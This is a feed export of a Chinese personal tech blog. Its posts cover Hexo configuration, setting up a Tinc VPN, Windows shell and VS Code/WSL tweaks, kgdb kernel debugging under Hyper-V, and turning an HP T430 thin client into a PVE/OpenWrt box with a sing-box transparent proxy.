    # use: https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json # 你的自定义 url
  #   scale: 1
  #   hHeadPos: 0.5
  #   vHeadPos: 0.618
  # display:
  #   superSample: 2
  #   width: 150
  #   height: 300
  #   position: right
  #   hOffset: 0
  #   vOffset: -20
  mobile:
    show: false
    scale: 0.5
  # react:
  #   opacityDefault: 0.7
  #   opacityOnHover: 0.2

SEO 和 RSS

SEO 我也不太搞得明白，只是生成了站点地图并且提交给了百度和谷歌

next 主题也提供了一些 SEO 的开关，像 baidu push 之类的，弄完后百度和谷歌会自动爬取页面，有新页面时站点地图也会自动更新。不干了，睡大觉！

RSS 和站点地图都可以用安装插件来完成。

npm install --save hexo-generator-baidu-sitemap
npm install --save hexo-generator-sitemap 
npm install --save hexo-generator-feed

]]> misc 配置 Tinc VPN /network/configure-tinc-vpn/ 在广域网想要使用局域网联机玩一些游戏, 如 Left 4 Death 2, 一般需要使用 VPN 来构成局域网。但是 openvpn, L2TP 之类的 VPN 配置复杂, 并且是中心化的 VPN, 若是服务器线路不好则会延迟过高。

考虑到国内的机器贵的要死, 国外机器延迟又高, 只有白嫖阿里云学生机才能维持得了生活的样子。学生机配置也不高, 带宽也不够, Tinc VPN 这类 P2P vpn 刚好能解决学生机的痛点, 我最后决定用 Tinc VPN 组建内网。

本文用于记录 Tinc VPN 搭建过程。

中心化与 P2P VPN

假设 A 机器和 B 机器需要相互连接, 但是都没有公网 IP, 中心化 VPN 服务器为 C, 在 A 和 B连接上 VPN 后 A 要访问 B, 则流量走向为

A->C->B

最后 A 到 B 的延迟则为

A->C 的延迟 + B->C 的延迟

若是网络结构保持不变, 但是 VPN 支持 P2P 连接, 并且 A 和 B 不全是对称 NAT, 则服务器 C 会辅助 A 和 B 机器进行打洞, 如果打洞成功, 最后的流量走向为

A->B

流量不需要经过机器 C, 这时延迟和带宽就不会受到服务器的限制, 并且能大大降低服务器的压力

如果 A 和 B机器之间的网络情况比较复杂（比如 A B 都是对称 NAT）, 这时就会打洞失败, A 到 B 之间的流量走向仍为

A->C->B

服务器配置

本来搭 Tinc 还是挺麻烦的, 但是有人已经打包了一个 docker 镜像, 一键部署就好

新建 docker-compose.yml:

version: "3.7"
services:
  tinc:
    image: vimagick/tinc
    container_name: plusls-tinc
    ports:
      - "655:655/tcp"
      - "655:655/udp"
    volumes:
      - ./tinc:/etc/tinc
    environment:
      - IP_ADDR=tinc-server.plusls.com
      - ADDRESS=192.168.32.1/32
      - NETMASK=255.255.255.0
      - NETWORK=192.168.32.0/24
      - RUNMODE=server
      - NETNAME=plusls-tinc
    cap_add:
      - NET_ADMIN
    dns: 8.8.8.8
    restart: always
networks:
  default:
    name: plusls-tinc
    driver: bridge
    driver_opts:
      com.docker.network.bridge.name: plusls-tinc

一般只需要更改 environment 部分

其中 IP_ADDR 是 VPN server 的公网 IP, 可以使用域名

NETWORK 是 tinc 的子网, 随便设一个就好, 只要不和你机器的网络冲突就行

NETMASK 在 peer.sh 中使用, 目前用不上, 但是最好也填上, 要和 NETWORK 设置的子网一致

ADDRESS 是 VPN server 在子网中的 IP

NETNAME 是网络名, 自己起一个名字就好, 要求服务器和客户端的 NETNAME 要一致

随后 docker-compose up -d, 就可完成服务器搭建

plusls@us1:~/tinc$ docker-compose up -d
Creating network "tinc" with driver "bridge"
Creating tinc ... done
plusls@us1:~/tinc$

此时服务器目录结构如下

.
├── docker-compose.yml
└── tinc
    └── plusls-tinc
        ├── hosts
        │   └── server
        ├── rsa_key.priv
        ├── tinc.conf
        ├── tinc-down
        └── tinc-up

3 directories, 6 files

如果希望 Tinc 启动在别的端口上, 可以修改 ports 配置, 语法为

ports:
  - "host:container/tcp"
  - "host:container/udp"

如果希望启动在 11451 端口, 则可以写为

- "11451:655/tcp"
- "11451:655/udp"

客户端配置

windows

安装tinc

https://www.tinc-vpn.org/packages/windows/tinc-1.0.36-install.exe

废话不写了

默认会安装到 C:\Program Files (x86)\tinc

安装完后安装目录下应该是这样

创建 TAP 设备

tinc VPN 需要使用一个 TAP 设备, 在 tap-win64 目录下有 addtap.bat

右键用管理员权限打开 addtap.bat

更改网络适配器名字

找到写有TAP-Windows-Adapter V9的那个网络适配器, 为它起一个别名, 后面配置文件中会用到, 这里起的别名为 plusls-tinc

创建配置文件

在安装目录下新建个目录, 名字为服务器配置的 NETNAME, 在这里使用 plusls-tinc

最后配置结束后的目录结构如下:

./
├── COPYING.txt
├── doc
├── NEWS.txt
├── plusls-tinc
│   ├── hosts
│   │   ├── plusls_x1c
│   │   └── server
│   ├── rsa_key.priv
│   ├── rsa_key.pub
│   ├── tinc.conf
│   ├── tinc-down.bat
│   └── tinc-up.bat
├── README.txt
├── tap-win64
│   ├── addtap.bat
│   ├── deltapall.bat
│   ├── OemWin2k.inf
│   ├── tap0901.cat
│   ├── tap0901.sys
│   └── tapinstall.exe
├── tincd.exe
└── Uninstall.exe

tinc.conf

在该目录下新建 tinc.conf

Name = plusls_x1c
ConnectTo = server
Interface = plusls-tinc

Name 为机器名, 可以随便取, 只要不和 Tinc 网络内其它机器冲突就行。名字有个坑点, 不能使用 -, 最好使用英文数字下划线

ConnectTo 表示连接到的节点, 由于之前配置的服务器节点名为 server, 这里填写 server

Interface 填写刚才创建的 TAP 设备的名字, 这里填写 plusls-tinc

hosts

新建目录 hosts

在 hosts 目录下新建文件, 名字为 tinc.conf 中的 Name, 这里填写的是 plusls_x1c

里面填入

Subnet = 192.168.32.2/32

Subnet 是本机分配到的子网, 只要不和别的机器冲突就行, 这里选了 192.168.32.2

在 hosts 目录下新建文件 server, 内容和服务器上的 tinc/{NETNAME}/hosts 一致

样例:

如果服务器的端口不是 655, 则需要在 Subnet 后加一行

Port = {Port}

Port 为端口号

tinc-up.bat

netsh interface ip set address plusls-tinc static 192.168.32.2 255.255.255.0

其中 plusls-tinc 应为之前设置的 NETNAME, 192.168.32.2 对应着在 hosts 设置的 ip, 255.255.255.0 为子网掩码, 要和服务器设置的一致

tinc-down.bat

空文件

生成秘钥对

使用 tincd.exe 生成秘钥对

.\tincd.exe -n plusls-tinc -K 4096

plusls-tinc 为网络名

此时会生成 rsa_key.priv

同时 Tinc 会将公钥附加到 hosts/{NAME} 后面

随后将公钥复制到服务器的 tinc/{NETNAME}/hosts/{NAME}

.
├── docker-compose.yml
└── tinc
    └── plusls-tinc
        ├── hosts
        │   ├── plusls_x1c
        │   └── server
        ├── rsa_key.priv
        ├── tinc.conf
        ├── tinc-down
        └── tinc-up

测试连接服务器

需要管理员运行

.\tincd --net=plusls-tinc -D -d 5

plusls-tinc 为网络名

如果能 ping 通 192.168.32.1, 即服务器 ip, 则说明连接成功

创建服务

需要管理员运行

.\tincd --net=plusls-tinc

linux

这里的需求有点变化, 该机器自身有一个内网 172.29.0.0/22, 我希望别的机器能够透过 Tinc 访问这台机器的内网

该机器的 ip 为 192.168.32.3

安装 Tinc

sudo apt update
sudo apt install tinc

配置 Tinc

在 /etc/tinc 下新建个目录, 名字为服务器配置的 NETNAME, 在这里使用 plusls-tinc

配置完成后的目录结构:

/etc/tinc
├── nets.boot
└── plusls-tinc
    ├── hosts
    │   ├── d315
    │   └── server
    ├── rsa_key.priv
    ├── tinc.conf
    ├── tinc-down
    └── tinc-up

tinc.conf

在/etc/tinc/plusls-tinc目录下新建 tinc.conf

Name = d315
ConnectTo = server
Interface = plusls-tinc

Name 为机器名, 可以随便取, 只要不和 Tinc 网络内其它机器冲突就行。名字有个坑点, 不能使用 -, 最好使用英文数字下划线

ConnectTo 表示连接到的节点, 由于之前配置的服务器节点名为 server, 这里填写 server

Interface 填写刚才创建的 TAP 设备的名字, 这里填写 d315

hosts

在 hosts 目录下新建文件, 名字为 tinc.conf 中的 Name, 这里填写的是 d315

由于需要让别的机器能访问 172.29.0.0/22, 添加新子网

Subnet = 192.168.32.3/32
Subnet = 172.29.0.0/22

在 hosts 目录下新建文件 server, 内容和服务器上的 tinc/{NETNAME}/hosts 一致

样例:

如果服务器的端口不是 655, 则需要在 Subnet 后加一行

Port = {Port}

Port 为端口号

tinc-up

需要设置接口, 添加路由

由于别的机器要借助此机器访问内网, 还需要配置 NAT

如果没有这个需求则不需要添加下面的 iptables 规则

#!/bin/sh
ip link set $INTERFACE up
ip addr add 192.168.32.3/32 dev $INTERFACE
ip route add 192.168.32.0/24 dev $INTERFACE
iptables -A FORWARD -o "${INTERFACE}" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i "${INTERFACE}" -j ACCEPT
iptables -t nat -A POSTROUTING -s "192.168.32.0"/"255.255.255.0" ! -o "${INTERFACE}" -j MASQUERADE

tinc-down

#!/bin/sh
ip route del 192.168.32.0/24 dev $INTERFACE
ip addr del 192.168.32.3/32 dev $INTERFACE
iptables -D FORWARD -o "${INTERFACE}" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -D FORWARD -i "${INTERFACE}" -j ACCEPT
iptables -t nat -D POSTROUTING -s "192.168.32.0"/"255.255.255.0" ! -o "${INTERFACE}" -j MASQUERADE
ip link set $INTERFACE down

设置可执行权限

sudo chmod +x tinc-up tinc-down

生成秘钥对

使用 tincd.exe 生成秘钥对

tincd.exe -n plusls-tinc -K 4096

plusls-tinc 为网络名

此时会生成 rsa_key.priv

同时 Tinc 会将公钥附加到 hosts/{NAME} 后面

随后将公钥复制到服务器的 tinc/{NETNAME}/hosts/{NAME}

.
├── docker-compose.yml
└── tinc
    └── plusls-tinc
        ├── hosts
        │   ├── plusls_x1c
        │   └── server
        │   └── d315
        ├── rsa_key.priv
        ├── tinc.conf
        ├── tinc-down
        └── tinc-up

其它机器的配置

由于其它机器需要以 192.168.31.3 为跳板连接内网, 则需要在 tinc 脚本内添加设置路由的命令

tinc-up.bat:

netsh interface ip add route 172.29.0.0/22 plusls-tinc 191.168.32.3 store=active

tinc-down.bat

netsh interface ip delete route 172.29.0.0/22 plusls-tinc 191.168.32.3 store=active

测试网络连通性

sudo tincd -n plusls-tinc -D -d5

可以使用 -k 参数来结束进程

sudo tincd -n plusls-tinc -k

如果该机器能 ping 通 server 并且别的机器能 ping 通内网则说明配置正常

systemd 配置为服务

sudo systemctl enable tinc@plusls-tinc
sudo systemctl restart tinc@plusls-tinc

]]> network Windows下配置shell /windows/configure-shell-on-windows/ windows terminal 真香！

Windows terminal

update: 2020-3-24 21:07:19

自从MS推出windows terminal后我开始真香了，windows terminal大法好！

本方案可以结合之前powershell的方案

效果如下

windows terminal效果

配置文件

profiles.json

未完待续

Powershell+wsl+tmux

update：2018-7-31 19:30:43

最近被babun和conemu恶心坏了，又滚回了wsl+powershell

更新powershell的配置方法，仅限win10

当然要先上个图压压惊啦

(请忽略那些奇怪的颜色

powershell效果

tmux当然要分屏啦

powershell效果

wsl

wsl也没啥好说的，装完后把tmux，git，zsh装上

oh-my-zsh: oh-my-zsh

tmux

tmux的使用方法：https://www.cnblogs.com/kevingrace/p/6496899.html

tmux美化插件oh-my-tmux: https://github.com/gpakosz/.tmux.git

字体

把它配置好后发现字体是炸的，需要安装powerline字体

在windows下貌似只有DejaVuSansMono能用

DejaVuSansMono：https://github.com/powerline/fonts/tree/master/DejaVuSansMono

powershell

powershell的配置主要是关于配色的，毕竟默认配色奇丑无比

再次安利微软的工具: https://github.com/Microsoft/console/tree/master/tools/ColorTool

可以将iTerm的配色转换为powershell的配色

个人觉得比较好看的

Monokai Soda
Wombat

git

由于彻底废弃掉了banbun，所以当前电脑中没有git，可以下载一个小工具将命令转发到wsl的git

wslgit: https://github.com/andy-5/wslgit

需要安装rust

ConEmu+Babun

ConEmu配置

下载安装conemu

直接看文档装就好了

https://conemu.github.io/

把背景换成老婆

看着老婆写代码才是最快乐的！

去掉丑陋的状态栏

去掉前:

去掉前

去掉这zz玩意:

去掉丑陋的标签页

按键配置

复制改为Ctrl+Shift+C 粘贴改为 Ctrl+Shift+V

快捷键

修改确认选项

这玩意新建task默认不弹窗口的，给它改改

修改子窗口配置

如果这个选项没去掉，在使用非终端程序时，无法使用ctrl+tab切换标签

子窗口

这样ConEmu的配置就基本结束了

虽然配完了ConEmu，但是它启动的还是傻逼的cmd，这玩意没有历史记录，自动补全就像一坨shit，windows下也缺少很多linux常用的命令，这时就可以安利另外一个东西——Babun

Babun

官网: http://babun.github.io/

直接引用Babun官网的介绍

Babun - a windows shell you will love

这玩意也不难装，跟着官方文档来就好了

比较麻烦的是把这玩意和ConEmu结合起来

结合ConEmu

新建Tasks

在ConEmu里面新建2个Tasks，参数分别为

Task1:

标题: zsh

"C:\Program Files\babun\.babun\cygwin\bin\zsh.exe" -c "CHERE_INVOKING=1 /bin/zsh.exe" -cur_console:p

task2:

标题: mintty-zsh

"C:\Program Files\babun\.babun\cygwin\bin\mintty.exe" /bin/env CHERE_INVOKING=1 /bin/zsh.exe

在Startup中把默认task改为zsh

最后

总体来讲配的这玩意还是有一点小瑕疵，比如在使用vim，ssh的时候，如果有这种需求，可以使用新建的task2来完成…

]]> windows Windows的vscode使用wsl中的python /windows/vscode-using-python-in-wsl/ 本篇文章已经过期！现在vscode已经提供了wsl插件可以直接在wsl下工作

由于个人习惯，exp一般都在windows使用vscode编写，然而windows下无法装上pwntools，一直想使用wsl中的python。然而正常情况下vscode是不支持使用wsl中的python，需要进行一番魔改，令其能拥有自动补全，查找引用等功能。

效果

pwntools自动补全

查找引用

单步调试

配置命令转发

首先在wsl中安装autopep8，pylint，ctags，python等软件

命令转发之前有人写过一个wslgit，作用是将命令从windows转发到linux，拿下来魔改一下就可以使用

项目地址：https://github.com/andy-5/wslgit

由于已经配置完成，最后附件会提供一个整合包

只需要将整合包内如下的文件解压

随后按下图修改vscode的配置

记得修改exe的位置

配置目录转换

在配置完转发后自动补全已经可用了，但是查找引用还是废的，因为默认传回的是wsl中的路径。读源码后发现查找引用返回结果时使用了completion.py，在如下目录

C:\Users\plusls\.vscode\extensions\ms-python.python-2018.8.0\pythonFiles

备份原文件替换为附件中的即可

随后还需要替换completion.py中的start_path为自己wsl的目录

配置python调试

在vscode中按下F5可以调试，然而由于默认环境变量是无法传递进wsl的，需要设置环境变量WSLENV

使用附件中的LocalDebugClient.js替换如下路径的文件即可

C:\Users\plusls\.vscode\extensions\ms-python.python-2018.8.0\out\client\debugger\DebugClients\LocalDebugClient.js

设置环境变量后确实可以调试了，但是断点功能还是残废的，原因和查找引用时一样，都是路径转换的问题

使用附件中的pydevd_file_utils.py替换如下文件

C:\Users\plusls\.vscode\extensions\ms-python.python-2018.8.0\pythonFiles\experimental\ptvsd\ptvsd\_vendored\pydevd\pydevd_file_utils.py

附录

附件：wsl.zip

]]> windows Linux Kernel 调试环境配置 /2020/10/linux-kernel-debug/ 由于本人用的 Windows 虚拟机为 Hyper-v，希望能在 wsl 中调试 hyper-v 中的虚拟机，网上关于这个的内容比较少，做一下记录

设置串口

hyper-v 有点弱智，不能在 GUI 界面设置串口，只能从 powershell 设置串口路径，下述命令会将虚拟机内的 /dev/ttyS0 映射到 windows 的 \\.\pipe\ubuntu-rootkit 管道

❯ Get-VMComPort Ubuntu-20.04-rootkit

VMName               Name  Path
------               ----  ----
Ubuntu-20.04-rootkit COM 1
Ubuntu-20.04-rootkit COM 2

❯ Set-VMComPort Ubuntu-20.04-rootkit -Path "\\.\pipe\ubuntu-rootkit" -Number 1
❯ Get-VMComPort Ubuntu-20.04-rootkit

VMName               Name  Path
------               ----  ----
Ubuntu-20.04-rootkit COM 1 \\.\pipe\ubuntu-rootkit
Ubuntu-20.04-rootkit COM 2

❯ Start-VM -Name Ubuntu-20.04-rootkit
❯ (get-childitem \\.\pipe\).FullName|findstr ubuntu
\\.\pipe\ubuntu-rootkit

参考自：hyper-v-generation-2-virtual-machines-part-5

为了方便调试，还需要在 wsl 中使用命令来把 windows 的串口映射到 linux 下的 pty

npiperelay： https://github.com/jstarks/npiperelay

socat pty,link=./ubuntu-rootkit.pty,raw,echo=0 EXEC:"/mnt/d/tools/wsl/npiperelay.exe -ep -s //./pipe/ubuntu-rootkit",nofork

配置 grub

修改 grub 配置文件是为了关闭 kaslr 以及设置 kgdb 调试用的串口信息。设置 kgdb 调试用的串口信息可以在系统启动后再进行设置，但是关闭 kaslr 只能修改 grub 的 kernel 启动参数。

若是不关闭 kaslr，在调试时栈帧符号可能会出现问题

关闭 kaslr：

close-aslr

未关闭 kaslr：

close-aslr

修改配置文件推荐在 /etc/grub.d/40_custom 直接添加 grub 启动项，旧启动项来自 /boot/grub/grub.cfg, 添加了 kgdboc=ttyS0,115200 kgdbcon nokaslr

kgdboc： kgdb over console
- kgdboc=ttyS0,115200 使用 ttyS0 连接，串口频率 115200
- 也可以通过 echo “ttyS0,115200” > /sys/module/kgdboc/parameters/kgdboc 进行配置
kgdbwait：启动阶段时进入调试模式
nokaslr：关闭 kaslr
kgdbcon：当 gdb 连接到内核时，kgdbcon 特性允许查看 gdb 内部的 printk() 消息。有两个方式激活该特性
- kgdbcon 内核参数
- echo 1 > /sys/module/kgdb/parameters/kgdb_use_con
- 不要在系统控制台使用这个参数

ubuntu 20.04 配置文件 /etc/grub.d/40_custom

menuentry 'Ubuntu,KGDB with nokaslr' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-1d1a1fdb-e548-44f2-9e1f-5d230b6179e9' {
        recordfail
        load_video
        gfxmode $linux_gfx_mode
        insmod gzio
        if [ x$grub_platform = xxen ]; then insmod xzio; insmod lzopio; fi
        insmod part_gpt
        insmod ext2
        set root='hd0,gpt2'
        if [ x$feature_platform_search_hint = xy ]; then
          search --no-floppy --fs-uuid --set=root --hint-bios=hd0,gpt2 --hint-efi=hd0,gpt2 --hint-baremetal=ahci0,gpt2  5c4a24c6-ed02-4d59-930b-2ce672e8b643
        else
          search --no-floppy --fs-uuid --set=root 5c4a24c6-ed02-4d59-930b-2ce672e8b643
        fi
        linux   /vmlinuz-5.4.0-52-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro kgdboc=ttyS0,115200 kgdbcon nokaslr
        initrd  /initrd.img-5.4.0-52-generic
}

配置资料来自： https://www.kernel.org/doc/htmldocs/kgdb/kgdbreboot.html

为了方便进入自己的 grub 启动项，可以修改 grub 配置文件 /etc/default/grub 中的 GRUB_TIMEOUT

进行完上述操作后需要执行命令让 grub 根据当前配置文件生成对应的启动文件

update-grub

中断 kernel

使用命令触发中断让 kernel 进入调试模式

echo g > /proc/sysrq-trigger

gdb 附加调试

内核调试信息可以在下面的网址找到，当前内核为 5.4.0-52

http://ddebs.ubuntu.com/pool/main/l/linux/linux-image-unsigned-5.4.0-52-generic-dbgsym_5.4.0-52.57_amd64.ddeb

解压出 vmlinux-5.4.0-52-generic

pwndbg，peda 对内核的支持好像有问题，建议使用 peda

gdb ./vmlinux-5.4.0-52-generic
# 设置串口波特率 我也不知道干啥的 好像不用设也行
gef➤ set serial baud 115200
gef➤ target remote ./ubuntu-rootkit.pty

在内核已经被中断的情况下可以看到当前寄存器信息：

close-aslr

加载源码

内核调试往往需要结合源码进行

gef➤ set substitute-path /sources/were/compiled/here /put/sources/here

或者把 kernel 源码解包到 /usr/src/kernel 或者 kernel build 的目录

GEF 配置 layout

legend regs stack code args source memory threads trace extra

根据个人习惯修改为

gef config context.layout "regs code args source stack"

]]> 2020 10 折腾 HP T430 Thin Client /2022/10/play-with-hp-t430/ 距离上次写博客居然已经将近两年了，时间过得真快。最近一直在忙，国庆终于有空折腾一下自己的玩具，刚好捡的垃圾 HP T430 Thin Client 也到货了，趁着有时间折腾一下它，并做个记录。先放个折腾的效果图（看起来很是简陋）：

final

基本配置

这个 HP T430 的配置为 Intel Celeron Processor N4000 （1.1 GHz up to 2.6 GHz）， 2G RAM + 16 G EMMC，千兆网卡，170 入手的（充电器 15，电源 25，快递 20），到手后决定先刷个 BIOS（原版的 BIOS 还是 2018 年的）。

BIOS 下载地址： https://support.hp.com/us-en/drivers/selfservice/hp-t430-thin-client/21316595

不知道为啥，选 win 10 的 BIOS 版本比 Linux 要低，这里下载的是 N41 的 BIOS，发布日期为 2022.6.27（听说能刷 N44 的，但是手头没编程器还是别作死了），下载后解压出目录 SWSetup\SPI40825，其中 BIOS Flash.htm 描述了几种刷 BIOS 的方案，其中尝试了 Update from Computer Setup 看起来它是将 BIOS 更新的 efi 应用写入了 U 盘的 HP 目录，然后由 BIOS 去主动调用来进行更新，不知道是不是因为我手头的板子 BIOS 版本太低，怎么试都不成功，最后放弃思考直接把 Win\N41_0110.exe 拷到装有 PE 的 U 盘里，在 PE 下进行更新。

剩下的步骤也就是开启 VT-d，设置来电自启，因为打算做软路由（万物皆可软路由），同时也因为把开关焊烂了（手残是这样的）。

PVE

之前一直看群友搞了各种 j1900，锐角云，并且在上面折腾了一堆玩具，趁着这个机会也来折腾一下，当作少有的娱乐活动（然而这货只有 2G 内存说实话有点蔡）。

j1900

换源

没啥讲究，就是 PVE 有个企业源，不加订阅没法用，可以使用非订阅的源

/etc/apt/sources.list:

deb https://mirrors.ustc.edu.cn/debian bullseye main contrib non-free

deb https://mirrors.ustc.edu.cn/debian bullseye-updates main contrib non-free

# security updates
deb https://mirrors.ustc.edu.cn/debian-security bullseye-security main contrib non-free

/etc/apt/sources.list.d/pve-enterprise.list:

#deb https://enterprise.proxmox.com/debian/pve bullseye pve-enterprise
deb https://mirrors.ustc.edu.cn/proxmox/debian/pve bullseye pve-no-subscription

兼容 emmc

由于 PVE 本身的安装脚本并不支持安装到 EMMC 上，安装时会提示 Unable to get device for partition 1 on device /dev/mmcblk1，因此需要使用 Debug mode 进入 PVE 的安装盘，在进入安装 GUI 前修改 /usr/bin/proxinstall 来添加对 mmcblk 的支持

} elsif ($dev =~ m|^/dev/[^/]+/hd[a-z]$|) {
    return "${dev}$partnum";
} elsif ($dev =~ m|^/dev/nvme\d+n\d+$|) {
    return "${dev}p$partnum";
} elsif ($dev =~ m|^/dev/mmcblk\d+$|) {
    return "${dev}p$partnum";
} else {
    die "unable to get device for partition $partnum on device $dev\n";
}

参考资料：解决 Proxmox VE 无法安装到 eMMC 上的问题

LXQt

安装后想着，闲着有点浪费，装个 DE 试试，然而折腾了一圈，发现 KDE 和 xfce4 都跑不动，最后装了个 LXQt（然而只是个玩具，Firefox 都打不开）

apt install lxqt lightdm

然而这个过程中还吃了一口屎，LXQt 使用 ConnMan 来管理网络连接，和 PVE 打架了，直接直接导致开机缓慢和无法上网，解决方案也很简单，卸掉就好了

apt purge connman

Openwrt

终于来到正头戏了，也是本次折腾的主要目的，安装一个 openwrt 并将其作为旁路由和透明代理

整个内网的网络为 192.168.2.0/24，机器如下

192.168.2.1：主路由
192.168.2.2： PVE
192.168.2.3：待配置的 openwrt

安装

openwrt 本身也是基于 Linux 的操作系统，PVE 则是基于 Debian，那最节省开销的方式显然是将 openwrt 安装为 PVE 的 LXC 容器，从而节省下虚拟化的开销

本来想直接在 LXC 中直接拉取 openwrt 的镜像，但是考虑到方便管理，还是从官网拉取了 amd64 的 rootfs 并自己创建了 CT 模板

链接：https://downloads.openwrt.org/releases/22.03.0/targets/x86/64/openwrt-22.03.0-x86-64-rootfs.tar.gz

为了方便安装（某种强迫症），我并不太希望在命令行中创建 pve 容器，因此希望直接在 web 创建，但是直接创建会提示报错 unable to detect OS distribution，搜索了半天并没有找到在 web 设置 OS type 为 unmanaged 的方法，因此只能手动修改 /usr/share/perl5/PVE/LXC/Setup.pm，让其将 openwrt 识别为 unmanaged

        return "alpine";
    } elsif (-f  "$rootdir/etc/gentoo-release") {
        return "gentoo";
    } elsif (-d  "$rootdir/nix/store") {
        return "nixos";
    } elsif (-f "$rootdir/etc/openwrt_release") {
        return "unmanaged"; # openwrt
    } elsif (-f "$rootdir/etc/os-release") {
        die "unable to detect OS distribution\n";
    } else {
        warn "/etc/os-release file not found and autodetection failed, falling back to 'unmanaged'\n";
        return "unmanaged";
    }
};

额外的安装配置：

特权容器（不配置会导致 openwrt 的 dnsmasq 启动异常，貌似和 ujail 相关，参见 openwrt-22-03-0-rc1-first-release-candidate）
swap 0
ram 512
磁盘大小 1G
4 core
关闭防火墙（我也不知道有没有必要，反正顺手点了避免吃屎）

此外还有一些别的配置：

开机自启动
功能中除了无特权其它全部开启（其实主要是创建设备节点？不开不知道有没有问题，反正我没测）

由于配置的透明代理期望使用 TUN 来实现，因此需要将主机的 /dev/tun 挂载进容器，参考自 OpenVPN_in_LXC

修改 /etc/pve/lxc/100.conf （其中 100 为容器 id），并添加如下语句：

lxc.cgroup2.devices.allow: c 10:200 rwm
lxc.mount.entry: /dev/net/tun dev/net/tun none bind,create=file

随后只需要启动 openwrt，并在 PVE 控制台中配置其 ip 和网关（参考自 openwrt_as_routerdevice）。

uci set network.lan.ipaddr="192.168.2.3"
uci set network.lan.gateway="192.168.2.1"
uci set network.lan.dns='114.114.114.114'
uci commit network
/etc/init.d/network restart

配完网后可以安装一些常用的包来方便管理：

tmux
luci-i18n-base-zh-cn
ip-full # 完整的 ip，支持管理 tuntap 设备等

web 界面：

openwrt-web

此外还需要在 web 中进行如下设置：

在 接口->LAN-> DHCP 服务器 中设置 忽略此接口，从而避免网络中存在两个 DHCP server。

在 防火墙 中将 Forward 设置为 accpet，不然 sing-box 无法处理其它机器路由来的流量，并会在内核日志中提示 netlink: 'sing-box': attribute type 22 has an invalid length.（参考资料：issue 100）

配置主路由

其实主路由的配置很简单，只需要在 DHCP 中设置通告的网关地址和 dns 地址即可（3 表示网关，6 表示 DNS 服务器，参考自 bootp-dhcp-parameters）

main-router

基于 sing-box tun 模式的软路由配置

之前手机上一直使用 SagerNet 作为科学上网工具，其魔改了 v2ray-core 并添加了许多的协议支持，为此之前我也 fork 了一份 Qv2ray 对其进行了简单的适配。后来发现 Project S 项目新出了一个 sing-box，貌似可以作为 v2ray 的替代品（clash 是什么，不熟不熟），因此决定采用其来配置透明代理

我本身有个 vless+ws+nginx tls+cf 的服务端配置，只需要替换 v2ray 的 vless 为 trojan（因为看文档描述 vless 貌似将会废弃）即可：

{
    "inbounds": [
        {
            "type": "trojan",
            "listen": "127.0.0.1",
            "listen_port": 10000,
            "users": [
                {
                    "name": "your-name",
                    "password": "your-password"
                }
            ],
            "transport": {
                "type": "ws",
                "path": "/your-path"
            }
        }
    ]
}

PS：下载时我还疑惑了一下 amd64 和 amd64v3 是个啥区别，差了一下发现是 golang 针对新的 x86 cpu 做了一些特定优化，只有在新的 cpu 上才能使用，亲测 t430 只能使用 amd64。

openwrt 侧的透明代理配置如下：

{
    "log": {
        "disabled": false,
        "level": "panic",
        "timestamp": true
    },
    "dns": {
        "servers": [
            {
                "tag": "cloudflare",
                "address": "tls://1.1.1.1"
            },
            {
                "tag": "local",
                "address": "https://223.5.5.5/dns-query",
                "detour": "direct-out"
            }
        ],
        "rules": [
            {
                "domain_suffix": [
                    "qiangdong.xyz",
                    "cookies97.com"
                ],
                "domain_keyword": [
                    "plusls"
                ],
                "geosite": "cn",
                "server": "local"
            }
        ],
        "strategy": "ipv4_only"
    },
    "inbounds": [
        {
            "type": "tun",
            "tag": "proxy-auto-in",
            "inet4_address": "172.114.0.1/31",
            "auto_route": true,
            "sniff": true
        },
        {
            "type": "socks",
            "tag": "direct-in",
            "listen": "::",
            "listen_port": 1088,
            "tcp_fast_open": true,
            "sniff": true,
            "users": []
        },
        {
            "type": "socks",
            "tag": "proxy-in",
            "listen": "::",
            "listen_port": 1089,
            "tcp_fast_open": true,
            "sniff": true,
            "users": []
        }
    ],
    "outbounds": [
        {
            "type": "trojan",
            "tag": "jp-out",
            "server": "server_name",
            "server_port": 443,
            "password": "plusls",
            "network": "tcp",
            "tls": {
                "enabled": true,
                "server_name": "server_name",
                "utls": {
                    "enabled": false,
                    "fingerprint": "chrome"
                }
            },
            "transport": {
                "type": "ws",
                "path": "/your-path-name"
            }
        },
        {
            "type": "trojan",
            "tag": "us-out",
            "server": "server_name",
            "server_port": 443,
            "password": "plusls",
            "network": "tcp",
            "tls": {
                "enabled": true,
                "server_name": "server_name",
                "utls": {
                    "enabled": false,
                    "fingerprint": "chrome"
                }
            },
            "transport": {
                "type": "ws",
                "path": "/your-path-name"
            }
        },
        {
            "type": "shadowsocks",
            "tag": "hgc-out",
            "server": "server_name",
            "server_port": 46887,
            "method": "chacha20-ietf-poly1305",
            "password": "password",
            "plugin": "obfs-local",
            "plugin_opts": "obfs=tls;obfs-host=833c936905.microsoft.com",
            "tcp_fast_open": true
        },
        {
            "type": "direct",
            "tag": "direct-out"
        },
        {
            "type": "block",
            "tag": "block-out"
        },
        {
            "type": "dns",
            "tag": "dns-out"
        }
    ],
    "route": {
        "rules": [
            {
                "protocol": "dns",
                "outbound": "dns-out"
            },
            {
                "geosite": "category-ads-all",
                "outbound": "block-out"
            },
            {
                "inbound": [
                    "proxy-in"
                ],
                "outbound": "jp-out"
            },
            {
                "inbound": [
                    "direct-in"
                ],
                "outbound": "direct-out"
            },
            {
                "geosite": "cn",
                "geoip": [
                    "cn",
                    "private"
                ],
                "outbound": "direct-out"
            },
            {
                "domain_suffix": [
                    "qiangdong.xyz",
                    "cookies97.com"
                ],
                "domain_keyword": [
                    "plusls"
                ],
                "outbound": "direct-out"
            },
            {
                "inbound": [
                    "proxy-auto-in"
                ],
                "outbound": "jp-out"
            }
        ],
        "auto_detect_interface": true
    }
}

其中 dns rule 中的关键字 plusls 和两个域名是为了过滤出代理的域名，让其直接走直连的 dns,从而避免产生查询回环，1088 和 1089 两个 socks 代理则对应了 强制直连 和 强制代理，运行 sing-box 后其会自动创建 tun 设备并设置 ip 和路由，十分方便。

为了方便其自启动，可以添加 /etc/init.d/sing-box 作为服务：

#!/bin/sh /etc/rc.common

USE_PROCD=1
START=95
STOP=15

